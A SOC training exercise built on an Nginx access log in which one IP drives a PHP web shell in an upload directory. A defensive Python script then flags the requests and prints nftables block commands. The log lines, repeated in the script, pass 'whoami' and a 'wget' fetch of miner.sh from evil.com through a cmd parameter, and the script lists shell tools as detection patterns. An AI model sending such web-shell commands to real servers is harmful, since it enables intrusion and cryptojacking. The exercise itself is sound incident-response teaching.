Security Operations Center (SOC)

🚨 CRITICAL ALERT: Anomalous Activity Detected

The EDR agent on the web server reported sustained 99% CPU usage. We extracted the latest Nginx access log (access.log). Your goal is to analyze the log, identify the IP address of the attacker executing remote commands (RCE) through the web application, and add it to the perimeter firewall blacklist. Keep in mind that blocking the source address only stops further requests from that IP; the script the attacker is calling and anything it downloaded or started on the host still have to be dealt with as separate containment steps.

[ /var/log/nginx/access.log ]

10.0.0.52 - - [14/Aug/2026:10:15:01 +0200] "GET /index.php HTTP/1.1" 200 4512 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.11 - - [14/Aug/2026:10:15:05 +0200] "GET /assets/style.css HTTP/1.1" 200 1024 "Mozilla/5.0 (Macintosh; Intel Mac OS X)"
10.0.0.52 - - [14/Aug/2026:10:15:08 +0200] "GET /contact.php HTTP/1.1" 200 3100 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.88 - - [14/Aug/2026:10:16:10 +0200] "POST /login.php HTTP/1.1" 302 0 "Mozilla/5.0 (X11; Linux x86_64)"
185.12.99.102 - - [14/Aug/2026:10:16:22 +0200] "GET /uploads/image.php?cmd=whoami HTTP/1.1" 200 33 "curl/7.68.0"
185.12.99.102 - - [14/Aug/2026:10:16:25 +0200] "GET /uploads/image.php?cmd=wget+http://evil.com/miner.sh HTTP/1.1" 200 0 "curl/7.68.0"
10.0.0.52 - - [14/Aug/2026:10:16:30 +0200] "GET /about.php HTTP/1.1" 200 2800 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
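As an added worked example (not part of the original exercise), here is a Python triage script that parses the entries above, flags requests that pass a command to a server-side script under the upload directory, groups the hits by source address, and prints the nftables commands to block that address. The log lines embedded in the script are copied from the access.log excerpt above; the list of command-style parameter names, the shell verbs, the upload directory and the nftables table/set names are assumptions to adjust for your own environment.

```python
"""Triage an Nginx access log for web-shell / RCE activity and emit firewall
blacklist commands for the offending source IP(s).

Added example; not part of the original page. SAMPLE_LOG is copied from the
access.log excerpt above. Parameter names, shell verbs, the upload directory
and the nftables set name are assumptions to tune per environment.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.0.0.52 - - [14/Aug/2026:10:15:01 +0200] "GET /index.php HTTP/1.1" 200 4512 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.11 - - [14/Aug/2026:10:15:05 +0200] "GET /assets/style.css HTTP/1.1" 200 1024 "Mozilla/5.0 (Macintosh; Intel Mac OS X)"
10.0.0.52 - - [14/Aug/2026:10:15:08 +0200] "GET /contact.php HTTP/1.1" 200 3100 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.88 - - [14/Aug/2026:10:16:10 +0200] "POST /login.php HTTP/1.1" 302 0 "Mozilla/5.0 (X11; Linux x86_64)"
185.12.99.102 - - [14/Aug/2026:10:16:22 +0200] "GET /uploads/image.php?cmd=whoami HTTP/1.1" 200 33 "curl/7.68.0"
185.12.99.102 - - [14/Aug/2026:10:16:25 +0200] "GET /uploads/image.php?cmd=wget+http://evil.com/miner.sh HTTP/1.1" 200 0 "curl/7.68.0"
10.0.0.52 - - [14/Aug/2026:10:16:30 +0200] "GET /about.php HTTP/1.1" 200 2800 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

# Matches the format used in the excerpt: status, bytes, then user agent (no referrer field).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ua>[^"]*)"\s*$'
)

# Assumption: query parameter names commonly used by PHP web shells.
CMD_PARAMS = {"cmd", "c", "exec", "command", "shell", "system"}
# Assumption: verbs that indicate host reconnaissance or a second-stage download.
SHELL_VERBS = re.compile(r"\b(whoami|id|uname|wget|curl|chmod|bash|sh|nc|python|perl)\b")
# Assumption: directories that should only ever serve static content.
UPLOAD_DIRS = ("/uploads/",)
SCRIPT_EXTS = (".php", ".phtml", ".phar")


def parse_line(line):
    """Return a dict for one access-log entry, or None if the line does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs turns '+' into a space and decodes %xx escapes, so the
    # 'wget+http://...' value becomes the command the attacker actually ran.
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def rce_indicators(entry):
    """List the reasons an entry looks like command execution; empty list if clean."""
    reasons = []
    if entry["path"].startswith(UPLOAD_DIRS) and entry["path"].endswith(SCRIPT_EXTS):
        reasons.append("server-side script executed from an upload directory")
    for name, values in entry["query"].items():
        if name.lower() in CMD_PARAMS:
            reasons.append(f"command-style parameter '{name}'")
        for value in values:
            if SHELL_VERBS.search(value):
                reasons.append(f"shell command in query value: {value!r}")
    return reasons


def find_attackers(log_text):
    """Map each source IP that has RCE indicators to its (timestamp, target, reasons) hits."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = rce_indicators(entry)
        if reasons:
            hits[entry["ip"]].append((entry["ts"], entry["target"], reasons))
    return dict(hits)


def blacklist_commands(ips):
    """nftables commands adding each IP to a blacklist set (assumed: table inet filter, set 'blacklist')."""
    return [f"nft add element inet filter blacklist {{ {ip} }}" for ip in sorted(ips)]


if __name__ == "__main__":
    attackers = find_attackers(SAMPLE_LOG)
    for ip, events in attackers.items():
        print(f"{ip}: {len(events)} suspicious request(s)")
        for ts, target, reasons in events:
            print(f"  [{ts}] {target}")
            for reason in reasons:
                print(f"      - {reason}")
    for cmd in blacklist_commands(attackers):
        print(cmd)
```

Run against the excerpt, only 185.12.99.102 is flagged: two requests to /uploads/image.php, the first running whoami (33 bytes returned, consistent with a username plus newline) and the second fetching miner.sh with wget. The internal clients and the single POST to /login.php produce no indicators. The nft line is the perimeter action the exercise asks for; the detector keys on the decoded query value, so URL-encoded variants of the same command are caught as well.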